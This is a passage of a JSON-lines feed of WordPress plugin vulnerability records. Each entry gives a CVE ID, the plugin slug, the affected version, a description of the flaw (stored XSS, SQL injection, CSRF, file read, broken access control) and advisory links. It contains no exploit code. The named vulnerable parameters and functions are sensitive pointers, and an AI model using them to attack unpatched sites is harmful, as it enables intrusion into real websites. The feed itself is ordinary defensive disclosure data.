page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202640%40perfect-font-awesome-integration&new=3202640%40perfect-font-awesome-integration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202640%40perfect-font-awesome-integration&new=3202640%40perfect-font-awesome-integration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/perfect-font-awesome-integration\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/perfect-font-awesome-integration\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11aac185-191b-4f7b-8472-84d3decd582f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11aac185-191b-4f7b-8472-84d3decd582f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11929","slug":"responsive-flipbook","versionImpact":"2.5.0","description":"The Responsive FlipBook Plugin Wordpress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the rfbwp_save_settings() functionin all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/responsive-flipbook-plugin\\\/2372863\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/responsive-flipbook-plugin\\\/2372863\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53b24f9a-f225-40b5-9937-f7449d4832df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53b24f9a-f225-40b5-9937-f7449d4832df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10867","slug":"borderless","versionImpact":"1.5.9","description":"The Borderless \u2013 Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.5.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/borderless\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/borderless\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88b0acee-f378-487d-8ab9-96146e0cde10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88b0acee-f378-487d-8ab9-96146e0cde10?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13500","slug":"wedevs-project-manager","versionImpact":"2.6.17","description":"The WP Project Manager \u2013 Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby\u2019 parameter in all versions up to, and including, 2.6.17 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239348\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239348\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wedevs-project-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wedevs-project-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70083f93-f110-4029-a3d3-ce8a77799a31?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70083f93-f110-4029-a3d3-ce8a77799a31?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13559","slug":"templatesnext-toolkit","versionImpact":"3.2.9","description":"The TemplatesNext ToolKit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tx_woo_wishlist_table' shortcode in all versions up to, and including, 3.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/templatesnext-toolkit\\\/trunk\\\/inc\\\/woo-compare-wishlist\\\/includes\\\/wishlist\\\/shortcode.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/templatesnext-toolkit\\\/trunk\\\/inc\\\/woo-compare-wishlist\\\/includes\\\/wishlist\\\/shortcode.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/775b6034-617a-4d84-a8fe-773ffbd9742a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/775b6034-617a-4d84-a8fe-773ffbd9742a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1530","slug":"tripetto","versionImpact":"8.0.9","description":"The Tripetto plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 8.0.9. This is due to missing nonce validation. This makes it possible for unauthenticated attackers to delete arbitrary results via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tripetto\\\/trunk\\\/lib\\\/capabilities.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tripetto\\\/trunk\\\/lib\\\/capabilities.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251202\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251202\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251202\\\/tripetto\\\/trunk\\\/admin\\\/results\\\/list.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251202\\\/tripetto\\\/trunk\\\/admin\\\/results\\\/list.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251202\\\/tripetto\\\/trunk\\\/admin\\\/results\\\/results.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251202\\\/tripetto\\\/trunk\\\/admin\\\/results\\\/results.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tripetto\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tripetto\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd80abd9-3f41-414a-a781-9bff7d85ec4b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd80abd9-3f41-414a-a781-9bff7d85ec4b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3064","slug":"wpfront-user-role-editor","versionImpact":"4.2.1","description":"The WPFront User Role Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.1. This is due to missing or incorrect nonce validation on the whitelist_options() function. This makes it possible for unauthenticated attackers to update the default role option that can be leveraged for privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This is only exploitable on multisite instances.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfront-user-role-editor\\\/trunk\\\/includes\\\/users\\\/class-user-profile.php#L104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfront-user-role-editor\\\/trunk\\\/includes\\\/users\\\/class-user-profile.php#L104\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfront-user-role-editor\\\/trunk\\\/includes\\\/users\\\/class-user-profile.php#L399\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfront-user-role-editor\\\/trunk\\\/includes\\\/users\\\/class-user-profile.php#L399\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3266542\\\/#file142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3266542\\\/#file142\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpfront-user-role-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpfront-user-role-editor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efc7ad9f-714e-474c-87e8-ecbbdfabd550?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efc7ad9f-714e-474c-87e8-ecbbdfabd550?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32180","slug":"css3_tooltips","versionImpact":"1.8","description":"Missing Authorization vulnerability in QuanticaLabs CSS3 Tooltips for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CSS3 Tooltips for WordPress: from n\/a through 1.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_tooltips\\\/vulnerability\\\/wordpress-css3-tooltips-for-wordpress-1-8-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_tooltips\\\/vulnerability\\\/wordpress-css3-tooltips-for-wordpress-1-8-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5234","slug":"gutenverse-news","versionImpact":"1.0.4","description":"The Gutenverse News plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018elementId\u2019 parameter in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenverse-news\\\/tags\\\/1.0.4\\\/include\\\/class\\\/block\\\/class-grab.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenverse-news\\\/tags\\\/1.0.4\\\/include\\\/class\\\/block\\\/class-grab.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313123\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313123\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313123\\\/gutenverse-news\\\/trunk\\\/include\\\/class\\\/block\\\/class-grab.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313123\\\/gutenverse-news\\\/trunk\\\/include\\\/class\\\/block\\\/class-grab.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutenverse-news\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutenverse-news\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8b1f60a-3a13-4679-af3e-d6f95fd83cea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8b1f60a-3a13-4679-af3e-d6f95fd83cea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23884","slug":"kanban","versionImpact":"2.5.20","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Kanban for WordPress Kanban Boards for WordPress plugin <=\u00a02.5.20 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-20-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-20-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2764","slug":"draw-attention","versionImpact":"2.0.11","description":"The Draw Attention plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_set_featured_image function in versions up to, and including, 2.0.11. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to change the featured image of arbitrary posts with an image that exists in the media library.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18530601-a294-448c-a1b2-c3995f9042ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18530601-a294-448c-a1b2-c3995f9042ac?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/draw-attention\\\/trunk\\\/public\\\/includes\\\/lib\\\/drag-drop-featured-image\\\/index.php#L500\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/draw-attention\\\/trunk\\\/public\\\/includes\\\/lib\\\/drag-drop-featured-image\\\/index.php#L500\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917528\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917528\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4413","slug":"process-steps-template-designer","versionImpact":"1.2.1","description":"The Process Steps Template Designer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.1. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to save field icons via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a98f6a68-5863-4147-86c4-8c19af469be3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a98f6a68-5863-4147-86c4-8c19af469be3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473649%40process-steps-template-designer&new=2473649%40process-steps-template-designer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473649%40process-steps-template-designer&new=2473649%40process-steps-template-designer&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4841","slug":"feeds-for-youtube","versionImpact":"2.1","description":"The Feeds for YouTube for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'youtube-feed' shortcode in versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/376e2638-a873-4142-ad7d-067ae3333709?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/376e2638-a873-4142-ad7d-067ae3333709?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966017\\\/feeds-for-youtube#file564\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966017\\\/feeds-for-youtube#file564\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feeds-for-youtube\\\/tags\\\/2.1\\\/templates\\\/feed.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feeds-for-youtube\\\/tags\\\/2.1\\\/templates\\\/feed.php#L33\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3899","slug":"3dprint","versionImpact":"3.5.4.7","description":"The 3dprint WordPress plugin before 3.5.6.9 does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will delete any number of files or directories on the target server by tricking a logged in admin into submitting a form.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3131e16-a0eb-4d26-b6d3-048fc1f1e9fa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3131e16-a0eb-4d26-b6d3-048fc1f1e9fa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4697","slug":"cowidgets-elementor-addons","versionImpact":"1.1.1","description":"The Cowidgets \u2013 Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018heading_tag\u2019 parameter in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/beb28e9e-bf6a-4eed-afbc-ca85ec489df7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/beb28e9e-bf6a-4eed-afbc-ca85ec489df7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/header\\\/class-page-title.php#L418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/header\\\/class-page-title.php#L418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/header\\\/class-site-title.php#L423\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/header\\\/class-site-title.php#L423\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5444","slug":"bible-text","versionImpact":"0.2","description":"The Bible Text WordPress plugin through 0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21eddf64-c71e-4aba-b1e9-fe67b4ddfb30\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21eddf64-c71e-4aba-b1e9-fe67b4ddfb30\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11975","slug":"reactflow-session-replay-heatmap","versionImpact":"1.0.10","description":"The Reactflow Visitor Recording and Heatmaps plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.10. This is due to missing or incorrect nonce validation affecting the _wpnonce parameter. This makes it possible for unauthenticated attackers to inject malicious web scripts  via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reactflow-session-replay-heatmap\\\/tags\\\/1.0.10\\\/reactflow.php#L882\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reactflow-session-replay-heatmap\\\/tags\\\/1.0.10\\\/reactflow.php#L882\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/reactflow-session-replay-heatmap\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/reactflow-session-replay-heatmap\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb360c56-e144-4dc5-8bfb-715a014cb8e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb360c56-e144-4dc5-8bfb-715a014cb8e6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11907","slug":"skyword-plugin","versionImpact":"2.5.2","description":"The Skyword API Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'skyword_iframe' shortcode in all versions up to, and including, 2.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skyword-plugin\\\/trunk\\\/php\\\/class-skyword-shortcode.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skyword-plugin\\\/trunk\\\/php\\\/class-skyword-shortcode.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/skyword-plugin\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/skyword-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/615eb349-c5ed-4b6e-bd60-b92b8790427f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/615eb349-c5ed-4b6e-bd60-b92b8790427f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13518","slug":"simplepress","versionImpact":"6.10.11","description":"The Simple:Press Forum plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.10.11. This is due to missing or incorrect nonce validation on the 'sp_save_edited_post' function. This makes it possible for unauthenticated attackers to modify a forum post via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplepress\\\/trunk\\\/forum\\\/database\\\/sp-db-management.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplepress\\\/trunk\\\/forum\\\/database\\\/sp-db-management.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4484fa86-5878-426d-92b9-8eb0751075e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4484fa86-5878-426d-92b9-8eb0751075e5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3431","slug":"dzs-zoomsounds","versionImpact":"6.91","description":"The ZoomSounds - WordPress Wave Audio Player with Playlist plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 6.91 via the 'dzsap_download' action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a78998da-1cb1-4991-95a8-a551bde04064?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a78998da-1cb1-4991-95a8-a551bde04064?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
